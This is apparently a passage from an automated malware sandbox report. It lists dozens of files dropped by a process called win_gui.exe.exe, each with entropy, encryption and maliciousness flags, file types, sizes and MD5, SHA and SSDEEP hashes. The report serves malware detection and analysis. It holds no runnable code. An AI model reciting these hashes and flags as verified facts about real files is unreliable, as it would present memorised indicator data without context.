                                Entropy (8bit):7.994227657485516
                                Encrypted:true
                                SSDEEP:768:gg6BwT9uc8XkBVwgWhTOXBGSfP0+R3zf/SzjruzRAJfb2T3Hws:8Bwl8VxhToPBDSzPyRk23t
                                MD5:194638EF54FED96EFAE023E0CF09B9DD
                                SHA1:670EBA95FF1B27FF91DEE4C4AE205F0A79ACA31A
                                SHA-256:78778C65D08827B94F583CA11A4C7383C65D2499C4BFB6C40E9FF0A0EA926271
                                SHA-512:AB636B97864D8D43BB91E1BA2992ED86E2265219C8BE957C25EF3EEEC63FB3359EC7DFAF5DCF3E8C1ACE60673F06563410D4F5DB14ABB921A0416862C6B3825C
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44736
                                Entropy (8bit):7.995962492060327
                                Encrypted:true
                                SSDEEP:768:z/4xeuJ1ElyGDDdmDIyob8J20C5CxV6j0OS+MSo/usYx7BExAlMZpI0kMa:z/8PWlhFz0x40ZpiFEalMXI0va
                                MD5:501295E3810366FF26462A6046F06EF8
                                SHA1:558CB519E77EB8E3313ECD40364B7C42A86840E7
                                SHA-256:90C1533764AAEAA36FCBA6EF04B2F009717BC79783269D68110319F54E565A34
                                SHA-512:9C746FE99D0B0B4C85CF2B8A42BB1F642008EADB243AE438482FE7717A336E415FC9EC36F6DBD3705E892A40D01CAB8470DC2FC7EB4941B137CEB8205865369D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):50126
                                Entropy (8bit):7.9961025303649045
                                Encrypted:true
                                SSDEEP:1536:9w7D3ctmJzLzokJoekSEJp3biUqEsRFi88gIox0t8:9w7jlXEkJoezEJp3biUpscG0t8
                                MD5:E1C4EB68729093D7F802B9C303053E7E
                                SHA1:65CA79F744FBCC518BB13E4F7F50ACCD1D36BD20
                                SHA-256:FB9C29EC4257F1E76ACE687A995F78F934BD85D0632DB173DCCBB5E0B23B7F62
                                SHA-512:89685CABC2BB2A98E46AFD84A8E5477DFB50D193714559DE7161CC89ADAF5FA07A23C73BA230697015C34F4B03165C5364DA831A9AE11BD71F0F95E2B3A987DE
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):53952
                                Entropy (8bit):7.996142365762297
                                Encrypted:true
                                SSDEEP:1536:FvNnr+NU8JrqTpmlW1zcmyPlVcwJdqEiX6eN:RkpJrqTEl2cyidaN
                                MD5:DDC1B6C8056A292120E89D7253707226
                                SHA1:D5E031FAA5E8031F3665EE2D0D674EF9A85C9E9D
                                SHA-256:4C02B1AA311CD87A5A68BF26168FDBE9BB395690FD95AB4C4AD24EEEE070776D
                                SHA-512:45C19766C51FC3D945D4761AB0FE05B3F76F348732FFB6411057DD1910FB4E0D886994CFDCF32581F534DDA1C605591C78645821B4FD530106A1370960F7BEA8
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):727248
                                Entropy (8bit):7.54530492891434
                                Encrypted:false
                                SSDEEP:12288:NAv2/xE/TfXA0F1ll7I4zXXRpR4uBkrdyWbh1v/Q2G9d4lOiezp4xFuM2IL:NmWxyTfXAGRCrsE1XpY4qzubVL
                                MD5:D9ACF169A824F28B1C9D68CED0D4A8D5
                                SHA1:7F46DC43EE7099AAB844BECF0BCBCD9047DF7D95
                                SHA-256:37027F25E22A5982C1E51760D550A536C7C069EE9EC7A2C24B301BAD18BE0D59
                                SHA-512:DCABA78B8E3D40B4A55FFE4008BD08029EC5E9EF1421083BEE233BA18F76BAC9DA7AD16F80DAEBC06034046374ED078B4B5FA7258A5C45E292CF69EF2643A0B8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13601
                                Entropy (8bit):7.983221224499428
                                Encrypted:false
                                SSDEEP:192:tYyE5lk52JOO25uOA0MwO1d6hUfDIzXwCTbz0Fj07S8Oyb1yo3/ube9B6fx+VOy:Czm2J6u/d62D4XFej0+yhtGbe92+VOy
                                MD5:228C32A343F3D291286FAC3475B996A5
                                SHA1:F27B617C47397BC4330416A1EE927EB212ED094B
                                SHA-256:5471EF50559AA7365A633D502EEBC078D0C437B00DCE68E11E5DA059B01F8B22
                                SHA-512:178A9DE7F07B8E63892DBF4F2FF083346CC57320B1F2D1EDC65378CD45AB570E16EA199FBFBA84A1C01CD855E278A1F73D09626302183286283DA94C650A6848
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29584
                                Entropy (8bit):7.994526651388148
                                Encrypted:true
                                SSDEEP:768:+yK1t1xk6Q1cDmMt/P0MJ77mO98fl0y4tLu4LY:81q6KcD1/P0ii8by4dc
                                MD5:35E4607D6D1847E241ABB915EA0AFE85
                                SHA1:6EBF1377931629FA09E054C7224DDB7D5B9C6031
                                SHA-256:5BD93254C5164C607BDD196E17A6B723D12049A623D1666CDE9C793992667F2F
                                SHA-512:1B7B83665BFC273727BE351D43889AC1651D205A3AD2B52A639FB2D1C7D50C086409B93B4586EAD9FB51CFCDF3925F530A5B544A6535BF2B45BFAC9A8C9CCFF9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):921296
                                Entropy (8bit):7.15979202597751
                                Encrypted:false
                                SSDEEP:24576:2t0yRV0GZzcgyxUbCPnImH52jW5dG+Fabp:2S+V0GuHMjW5aN
                                MD5:BB5CA076A2C8CCA0930F5A6263626A43
                                SHA1:25FC19EEA2DCFC14CBC7CE86C284D16DC21FDE1F
                                SHA-256:BBED363836AE4C1F64C78443C44F699C103F6F22CE522883CCD3FA1F046CD050
                                SHA-512:3F2E88551F326EB443681C64B753F29909FA41A5448DAA98CA0EC3899C6C846C4C555481EFD4519021CA9B3CFCECDEA2DF36F89AABA053F9D67BD6068AD47D17
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28154
                                Entropy (8bit):7.993722721890511
                                Encrypted:true
                                SSDEEP:768:PABJTEFKs4FOV6pUbr/t+spf/KSxP9M5MeKvnj1IVPeR0H:0hEd4Fwh+G/KSxO5pKvnj6PeRO
                                MD5:EA0DA680B9484333A3BD95DF422FAD04
                                SHA1:D154E948152899B8E4842BEC241241E62695146C
                                SHA-256:B27AB290002DA1C76024494BD44D722AD3214D40B743CA5542B3DE9EE87562FF
                                SHA-512:683960C31E1D60ECD1CE5DD726052E56F152CD407BA3EC3BACAB1C129793C4AC3524F74B65A77524DC65763C034B4B4DE265E7D4FBE65E30D8794045DA61B21B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3462
                                Entropy (8bit):7.940917216573625
                                Encrypted:false
                                SSDEEP:96:vzykSMVNYouBXofDeVhm7GSKlpycLPqMevuAVOfh:rykdV6BYfDWhmCTyczqM+VOp
                                MD5:EC862B4F15B1E1B093AF21D3D30B5D54
                                SHA1:FC87989D1E58611418CAC99751C5A8F1315ED0E0
                                SHA-256:C6A55D67958D9BA421D8468B620C885AA43CCBE89F7513EBDCC96675F682622C
                                SHA-512:6BA46FEDD864068956F576BCC5359F725CB4E6A5149987015BEEB8E0D50588F14B1505DEDAFE00873315917AB2D725214664CCAC505018DCD821E97EF1EBA470
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64878
                                Entropy (8bit):7.997374523369192
                                Encrypted:true
                                SSDEEP:1536:mGzMDm97mWHuma/m8ogMsczPjsQ/AZJz/+jyv0U7E3kYd:mGIDm97mXma+MNCAGCV/+RR3L
                                MD5:AF6BCD827E25579D2E48FDE08714F93B
                                SHA1:46CCA749B27C16402BB064E1C07D4AE480A16EE1
                                SHA-256:0E8FF2CE34CF7F87578C0659A234B52D53C468D0F77C25EB7896B204A9125D5E
                                SHA-512:01FC0232435F459D849F1881A01B067E6475505CE18B7B1F0A474C73C6A40DD4F65F9BCA0D913DDBE498CEB00D7345C41CF1CE9BB5D1985716D760E682B6305D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6801
                                Entropy (8bit):7.972191929260046
                                Encrypted:false
                                SSDEEP:192:6fhPWgVkJwaFjVonsPAek/S68nTTd4wnZdKJyVrkJMkIh0+VOV:6fEgVIj+nsnk/SNnPrZdGErbkIh0+VOV
                                MD5:78A4C61DB2327F3F1E8AB2D36F80E681
                                SHA1:7A6D361C8CC0E8BE8CA52DAD4F3E150194BD60D6
                                SHA-256:9A10B1CBBAFF564343DC534D9EEEAC31E2AFF37A4F1EC800FF6BB6CB40453C49
                                SHA-512:56DD2C11F44E17E6884431B125105792412604104F4FEBF77D9C305B9FB3744E69470DDC8C0E8ACB43DCF8A407A33A444D964AC6416FE7C68DC1DAEE54A011B1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12443
                                Entropy (8bit):7.985215528092471
                                Encrypted:false
                                SSDEEP:384:Y5+dQGeZXLFStcMW47H+tkWtMFNYt5QaGCQL8lo618ZR4+VOd:5dQGCGcur+tkNYQabY8ld/Z
                                MD5:C796F4D03DFB0EF210F32E727BAD98FA
                                SHA1:AE263A8FFC9EDA3FD853471768AD3D8264C92F56
                                SHA-256:6CA4D4DA485DF413F3FEA6CD2A22798D998FF9D936044722B17B5F13EA84A3B9
                                SHA-512:5612B4CF503828AE16D3ECD1BBF2F774D99BE6ED0CCED135584D0186A4BAF51A0EB076F484AA6869739B2D180F52F35E6E49C6925C2D3F5F7406A013B1FCFC13
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6134
                                Entropy (8bit):7.969404432664336
                                Encrypted:false
                                SSDEEP:96:AMD5w5uhX3YEqVaHKDXD35Ia2p4+IPDLs6LXetUmd+7mb1RsUD8mHPuspSvV0GgE:hVwE3Y7fz3H6/wU6LXet/vRzvPuSSaGx
                                MD5:7B44CCB97188BF079BB944B1BB631DFE
                                SHA1:872B85954E6362B139A7DF6DDBB6AEF75A2B13BF
                                SHA-256:9D6D33EBC9BF67174530B7516AFB035FA7070557DE1ADCA238A3887318E9BC66
                                SHA-512:EB3AB577DC02FBA9C89C3987EE37657B831E448F51D9E544E4B4973896DE626049E5FB05E0D577B51B0A2D4A52406859E594D47727F5E403391B8D5BB4DF926C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):14341
                                Entropy (8bit):7.987830222270157
                                Encrypted:false
                                SSDEEP:384:xkauvt1+daIWOPrEiDtSNryP2BvKmC17gYwn+VOq:xkauvtwdQO4eSNryO8f7xq+
                                MD5:067F1517FD4BDFB132D8357C76907A22
                                SHA1:5D76C35435FA39632757800F4DEDC293D2F30F99
                                SHA-256:4DD510C1088B44DC099292A4C202DD4AC6277BABAABEEF153BE9030808D8E80B
                                SHA-512:FBBE0A2C846BF624814E17ACDD0D5D17683B34C5A7241D6AE2F1106B2DABCDE8BDF9A56F1C15323ECBE4FE68F821CB5BEC9CEAD0192A096404524392711B207E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3273
                                Entropy (8bit):7.938864640053381
                                Encrypted:false
                                SSDEEP:96:WhYNSWoCkVxnn72cRtBDYKlOuvrYHevuAVOe:Whe/oCkznnycRtBDYK1ru+VOe
                                MD5:40FEE7ED1E55A9D50C78235CFD7A64BA
                                SHA1:C85876704CF0017949E9D5E8636CA8C2F2C47BE9
                                SHA-256:B5D56330E8F19FE93DD2342CE6E7A31CCB8511EEB52B7764D50F12E2F130C698
                                SHA-512:22AAF118BC3D76EFC5995C24228CC633B281ECC0EDD9D8D42A1E58BE742B64C26D882AC85624704226D71400628A396375980A1A6B7C0B0417BED2D5B9C3DFBE
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10009
                                Entropy (8bit):7.982759594693455
                                Encrypted:false
                                SSDEEP:192:6lTT74659Fb/M6Du5WwxoquGq5LE3ryMhR2CGsl2d+VOF:yDpb/MBP+qTpdhR2Cf2d+VOF
                                MD5:09894C57565368FD054FFE7D6DA7DD63
                                SHA1:EC8ED863644CCBCC63FAA0EEBEF9605EBDEA7DAA
                                SHA-256:8DB5FDDC74AE0C456D8F0F1DCFB380F5B3D3E8E0D14343EA85C2A18855DFC171
                                SHA-512:0EF28457976A8E6A64573C7C2B847158BD7E85ECD3058D29CEE1DCFFDD0BFE289AB6FF84EBD14B8B39CCB8EE3E548B9B58B3F90A3D2FD04DB56A7D8879B4BFCB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7297
                                Entropy (8bit):7.975410771018185
                                Encrypted:false
                                SSDEEP:192:n86N8K7e//WyGCRx0kx+DP4QpkCpHqAaXerbe7E1S8W+VOv:/z7UOY0HkwHKerbe7yS8W+VOv
                                MD5:F5FE8E66FF5745735032F6C4C75CF857
                                SHA1:462E7DAF0FD229CE183ED705B92C2013B185BE0D
                                SHA-256:E7BC6D464EA6E77C5A892A49E9A708D10096D560F8110781537C64A291DF57AB
                                SHA-512:1FB2A3365A3D6CEA00524CD4B185F814CE7653239A05EB9ADC72B95AFE463EDBED5250D0F169617BB2BE5F92A28E563339C20FD3D9A39784F9FE2A412A2D5A13
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):110649
                                Entropy (8bit):7.998577390807684
                                Encrypted:true
                                SSDEEP:1536:b+zJ499sDgfP9aYIDzb0RG6ve8dFdVjzNRC5My7CrFUX9wBqjoZfbTZNplHMrDcx:biJ499sDg8YuAveIVjDqHGRbzT3s8x
                                MD5:8524DE3FCD7AE23F7D7A9CEEFADA7CF4
                                SHA1:A34EA92656E68D9F408C7362D40ACBD805522986
                                SHA-256:C4FA6FB9E8614F7D572FF693ED8A41CDFED4D094D947CF22380D2889DCA70698
                                SHA-512:C99811C3BD781128FC679B40F88E1F4A204717007161E390881712575D95F763D5D28301F5EE70097EB0C217687458AE0609DA17748ED89578F3E543BDA13F40
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1759
                                Entropy (8bit):7.867088924016625
                                Encrypted:false
                                SSDEEP:48:7Sjc0wCFkZlwMf7IfeZ/WyYu+MAVMJg6T1j:7SrwYkZl5f7xevuAVOZ
                                MD5:89C66F176FD881CC66FE355194FC62F4
                                SHA1:776A2298CD9B2D1A31F44530CA55D2C34ABB3290
                                SHA-256:70F5C7709A1885CAF92AA16E34424A27338FCA2239C66ABFFA4A4AF5AFBFDE1F
                                SHA-512:46498D02B2D98DADCFD88C1E094474B9951534AD6C00E11AC476A9D654BC93F8EB5BB3105EDDCB8F12F96DE831B6695D57C07D118330A691102DB7524CC6B03B
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40581
                                Entropy (8bit):7.9951768017936375
                                Encrypted:true
                                SSDEEP:768:jvs/ZJkMnuTVLnDZY6xH1J5xfcyDhrM4jgMayXpApR2MXShT0LSoPlmSxRVS0i:sZSMniDS+Vvxf1NIzM7ERGhT0LSoPlFk
                                MD5:64B7397C9B6F61D857A2D0B9F426C05B
                                SHA1:FEA3235CB5AB6757ABC09FFF6B1DF6476F2A8FF4
                                SHA-256:1D99FE25D330E8C7782A8455F191FA388430DB7916FD96395E6D534138137B86
                                SHA-512:0F49762524B68536A71E89A7FCAA1AEE5A8C308144A7328E45356F4D65627C81592E1DF2254750B30669BFACA51605A0563F9212253609576CF0CC5DA737AD08
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2128
                                Entropy (8bit):7.902718904780669
                                Encrypted:false
                                SSDEEP:48:Kf/L5JPVZ3ZAmu60vzb4+6agFfCo8tRN/WyYu+MAVMJg6T5w:EL5Z3ZAm4GagWNevuAVOi
                                MD5:39409E191C1069EB52B277F43BFD5576
                                SHA1:A33B93FEDA63A97277AD08A50C8EEFEAA4377420
                                SHA-256:23FC7C293A383FCA53476195FFD4986F42097A0A154596F4B42A96BE9A6E4F89
                                SHA-512:FB79DDCA32BC73DFE7FEB2C5A4E75354CE2B1D84F6EB9E2F1BBFBC6C90C80C69A0C12C29B7A38C4D0FD713CD171AA0C0CFE1D7D0A057C0E166FDE9519D4BDA85
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10082
                                Entropy (8bit):7.981733784576309
                                Encrypted:false
                                SSDEEP:192:Svq8vhPXwMxpfkO1ASsvPHE3Uci3v8QUjcGAyi+99+VOA:SvZPgMxpxsvc3Bi3v8Hjcqv+VOA
                                MD5:BE4D5BEF4B7E200A8F58F52C29EBF202
                                SHA1:EE381169A0D617C7BB7A9D8B79D0F928F5DF9B00
                                SHA-256:1CF9C28DCB5C388FB4AD385674731643B4C30C4E8D017F1F26F245BF4733E11D
                                SHA-512:8613EB1FECC7DD6F5434CEF2769F634AA4DC72CBBCBD0346218CA468AF2ACACD26C8E9FA14876BE93F0CC1AAB5249EBE26883F85A9CE010E10156D5C9B7E330F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6066
                                Entropy (8bit):7.972090817515263
                                Encrypted:false
                                SSDEEP:96:DBDHvWtj5yyukkKAuI0VtCqCKr1+SkstB6/+gcsxBmqS+X3HgevuAVOuC:FDHONzBAuI0rFCKZ7P6Ggvf6aXg+VOh
                                MD5:449FF52EFC7F09FDD5922019ACD03292
                                SHA1:87240B46CB67A486380D14471ADC0B410AB1B3AA
                                SHA-256:684857B10C84FCE80E94BA379C6EAC8F506ADB8DC997FEE67A2303C34E8ECDFB
                                SHA-512:31C7CA95FBD416B12330E4E4B6D1FF11639127D2471D20CCB83465FCCB438D32CADDD44991A8B538E19FEFF45A818CFD462A1472A16803F952AFC37D27D3BCF4
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):30168
                                Entropy (8bit):7.994481161928793
                                Encrypted:true
                                SSDEEP:768:YNU7Tg00l1SPbp6HgFvIJrAG/P0Yuu7WNYFdf:Fng0c0UgdIRHUY9I85
                                MD5:74020D873E06EECCAFE0D4CE11146CFC
                                SHA1:70C2D7CB0898F567772D6C34B5BC813335C7F116
                                SHA-256:EAE73B968C0CD53327458886310F82B9C83066E17F360886179B6407352CD18D
                                SHA-512:6ABA26998DF21A8F49B6F30A032D534F7AC4220ABCEEBEB4BCC5AA558B200A49ACAF0185C7C0F26773AFA1E176E97B1AFDD67A24A1E957E54D2D20EEE42890D1
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33490
                                Entropy (8bit):7.9948156280750355
                                Encrypted:true
                                SSDEEP:768:ligBB+TXUL1Z3KfD3M1QK/2mx0L3KPU+zh8ePIXPfF5NqmqY:ligBB+TXUJZ3QD8r2mx0L+NFJw15Nq+
                                MD5:90D91CAD42D4582941239C027FA6E5CF
                                SHA1:450207A06D3F90BA710AC58E4DF1FA0FEDD6FBD9
                                SHA-256:A797AFD81ED1E0442E3011C2E007BC44F2AF799516CA25EF46886320C86FEC57
                                SHA-512:8C97E2A2975F5E5D4E2C87D16BFC1037B0F9DF70F7E51E5C3DFB60DCC7F2CA421DC5AD17AC914CD3C205EAC05AAC5E3882385F161D12AA86E71CBD65DC95F35B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):39594
                                Entropy (8bit):7.994625408041425
                                Encrypted:true
                                SSDEEP:768:3WZXM1+ZRpeKcLtQKJDFbxfvlZC4D6QhlemYoFxSIEmOAcRp7TZfFM/RL:IRpeKatHBxXSc1hle2WPAcRp5ts
                                MD5:F114C3EC82259355422D39744E3DBC59
                                SHA1:9E814BC8EDE2AEAE39CC069D96FD49319C8CDB85
                                SHA-256:BFFC2973CB5B92AFA61A27B557C5089BD2555648FF7E2140088A360901118A04
                                SHA-512:18D43FC74EF7E602A7644D642F8054E70604A35133360E296E56A6AB131FB23291F0F277EC8505BD074907762FB31E26F687E510E86920464C2471BC232E0D17
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:PGP Secret Sub-key -
                                Category:dropped
                                Size (bytes):12615
                                Entropy (8bit):7.98572150547311
                                Encrypted:false
                                SSDEEP:384:Uux+VS3JVTjm4Dzt+qp+l8jXGY1JDUGpv+VOX1:nxg6K4DpmjADbL1
                                MD5:33797C6A0930B40CB083058C0657921B
                                SHA1:EE461057C59EDBE3A6A667CD124519D2C8DDFCA3
                                SHA-256:04F822E42C0875ECBF5123795070B47791909FDDBC7ADA4942B178DD928F90FE
                                SHA-512:7EE7BC3F4BF66AEEC2A1AD025CBBC77A23B82C88D99CF946617C47A5F717236814B703B0756F820D8F460EC73B2CFDEE09327730A3E62156ADD8FDB87A74CC2F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2215
                                Entropy (8bit):7.914268010192206
                                Encrypted:false
                                SSDEEP:48:XV9wGQY+QujhGMqariuLn15sYsaWi+z8Amf/WyYu+MAVMJg6T8jk:3QfZqyL15sdzSfevuAVO8jk
                                MD5:5CDAF28294CD49C96460F383DAAFA323
                                SHA1:DBC6B8E385DB7F3CB633A772B009B778F5DB55C2
                                SHA-256:6C28F6D6900D1AC9E377DBB390925F720D43CBEB2347FFFABB881047107460CF
                                SHA-512:E5FCBBD0578BA4A81765DECBFB7C3A1224F510BB4AC2C600933240DEEF8DF4F3E6FEEE05753A7DC5B725D34652A382B71765394D5C4E5A630C647340F28D1866
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):96134
                                Entropy (8bit):7.997944598452704
                                Encrypted:true
                                SSDEEP:1536:YVTouI2r7FTe5YGFSxuoj95BLWFHd2DR+XW56Ic6er55OrYRWGuVFjQd+V:eTgKFTe5jIsoj95BLWFHd2DCW56Zr5kB
                                MD5:35E96EE34AC94F3FA9A560D086FC1E14
                                SHA1:41BF2E228A0C0D5FDE7CEE4683312E8807C283E3
                                SHA-256:2C31F2FE56E276E3A45BCCE794CB6BDF901B95CDFD5502A4D6A3CC0BC6310BE0
                                SHA-512:383289B7156D24CF52D8A231A599C373AF0055591CDE17CA7582DDFA9F2E8D3E103EBFE0A6FB70C44BC80E22FFF9BAEB46A5071C8AAE1148C4DC27826935F1F7
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):204689
                                Entropy (8bit):7.998953386038572
                                Encrypted:true
                                SSDEEP:6144:L7m5HDV3QHORlZY92Wn3zIb88zK5Tod+A:L7m5hO0ZY0Wn3zkR6ah
                                MD5:156B24A8C90C95A8C8245156958D6F42
                                SHA1:898263276E98D291A3728402DEF8290E1E104D8C
                                SHA-256:A3A5A2704F3F73ED234D4E51C92C5C93FE6464B253DF7805F02FDF98BC942C83
                                SHA-512:97082E9B1FEEACE6672154BA6FD40986033B891F764D4C49FC971C46D62F014C8943F468B409D3AEAB9BCA57112AF5974B35964F7958714081966251A6D8DABD
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20569
                                Entropy (8bit):7.990741444866277
                                Encrypted:true
                                SSDEEP:384:5irAwJ+H64sfscmTYYEMILyadMuwp1ygVRMTINOar/AW/dEdZXmWbTStUU4nm4W7:srFi6RfHmTfEMI15wXygHmM/dEdZxTSv
                                MD5:037D346EF8654808A016C1D362C7EC50
                                SHA1:EE25CA72B04D2B9D31B5C661529E23F93490CF95
                                SHA-256:EEBE2BC788F6BD503F6286B5F0522466D00C09A8F5E7CB45A826B31CBC0E1CDC
                                SHA-512:759BF0D8DF0BF514C89B77095569F1AAF8C059B1D9AF126B23A33E39BA91E36141419839C1A8E81564FA5584B7F60618111B444B37E783C0F0ADE53B2A9126F4
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):30134
                                Entropy (8bit):7.993583297375008
                                Encrypted:true
                                SSDEEP:768:dkuqDArppbKd9O+LZztnF9cIy4Lckx/2Iewn882ryUC7WMac:HUAryvOEvcl4LivM882srj
                                MD5:4CDA38949198BAE427B720A3899850A6
                                SHA1:DAA6530A920CD68683C01414E5AA48384139A68E
                                SHA-256:1A02D43714B8890FE8323F2B071EFB3125C276438ED84E9B9602D51DA6265119
                                SHA-512:954C530A79FB09FEC1DE5A2CD436E2AE87BF45FCAC7240E99C82F0B99509D4EF53FFE5ED856733A600C0707368B4F6135CEDC8F1F9F5314053D89056EFFDE202
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13689
                                Entropy (8bit):7.985370118783377
                                Encrypted:false
                                SSDEEP:384:J+zEWzJgt9Zv+NCIeuGZWkoWn5dcrwWMyNwr+VOe:aHgt9Zuv3Vk3n1y4K
                                MD5:6702A4DEA1D88FAACE2FB7E7A7F399BD
                                SHA1:AEEC92DEB58C6B6FB5C6524949814C85780D387E
                                SHA-256:0FA92F9F0FE495D3F92A8956447DE2C06571AD77D4830D94AF548481F3FC85A0
                                SHA-512:51773BF2D327B9827C5386A03FB6C37BBEC289834ACEA17CD3C36111922ED61F2CB795D87BA6FFC25DE30239DE44B78DCE1A1FFAB1632855A0CCDCE156358FAB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):26096
                                Entropy (8bit):7.992708898630628
                                Encrypted:true
                                SSDEEP:768:tUKdDAbw1tAZMfJxkAhb4hNiRNOB4J4EF1O:RKZKCiRNB4u0
                                MD5:E2711AF78977AE8B8D1273A354AD190C
                                SHA1:54849E75FA095A1F1A304B911EC5CE39E2ED81D3
                                SHA-256:DFFEDD1F52DF1D3049221E63407C1703E05D95152688212065F9D808B89B72A8
                                SHA-512:6B7DC28CAADF0295DE7178D0A32BED2BBDBBE5D28FE176D4AF31EF378CAC17A22681BAFA0512CC23AF601D2FD4FF7B3491255C2B10417A2C3FD11E8CE0A469A9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):18613
                                Entropy (8bit):7.99099778930684
                                Encrypted:true
                                SSDEEP:384:ZD5w+V2HJMhEJYcFLoVBF480N5f/3DWddYhlAsbUY3Gqn+VOd:ZD5xKJMhEJYcF+FofPDWohlAsbj2qnp
                                MD5:FCE0FB8FBAFC127C8960D7EE922B238A
                                SHA1:D20FA5772C47FA227F32A6A1E1A9B9AA894E6214
                                SHA-256:A01617ABDBC74E0634AC99772FE017329C3AF5E2236B536D101FBA928D211CA1
                                SHA-512:98C43DB8018628233B6BE057EA9EE37C26A077E53187F28486F75ACF2BE8F7B30604B29492196386462AFBC9C83F50B3F0DCD97C32ADA2F480074374305F616A
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):21307
                                Entropy (8bit):7.990746048928715
                                Encrypted:true
                                SSDEEP:384:fo1Mng0tI4HnpW58VH2q75U0YlDe6Ba1ub1LSyH8rdf2W0jnOBb5FSDdxLpGn+VD:foP6jHnpesv14DY1U1LSok2WpBbHSDdV
                                MD5:1F60FB3D3679410747377F1FBB08A5F5
                                SHA1:84EED593DADFB4D0704F0DF436CD46CD3DA1471F
                                SHA-256:CB064730E6D2D3B36120C8E679FE7F31EF5390CD887BCC571A3B6333ACB42AF8
                                SHA-512:B7C3D94394D3D81F6ADCDAA17488F9D34FDBEF6102E45F222AFDBBCAD5E58B8110535CA68B3E0FC67ED6A3DBD8CF911537E0D7E76460552496CF042CFEDCDD9D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22118
                                Entropy (8bit):7.990206503294256
                                Encrypted:true
                                SSDEEP:384:TGzXDsB7zDlznHUyfbAdQ9Dl0ErrAy0ZMvz2PiMl9vDFcDJBr+eUP7S4BruI+hlF:TkTsBdHUyfbAdQXfws49vACVP3BruXPF
                                MD5:9753376BA3F73A2A0B39B0F14DD0A397
                                SHA1:3F487AC1EDDD574F5188E765AEF8E85C7AC9A966
                                SHA-256:85CA1977149AF1B2A0956553CD3FDE64221BC162DE62066154120107621E2D8F
                                SHA-512:A36F563B5E15EC959607FFE01D742720CA56C7766DCFE5C0B4362C96D8C1B9B0498E3496BBDEC604B445C5FCC99F9EF589757442A162B80453522745CCAA6D71
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14831
                                Entropy (8bit):7.987045338436014
                                Encrypted:false
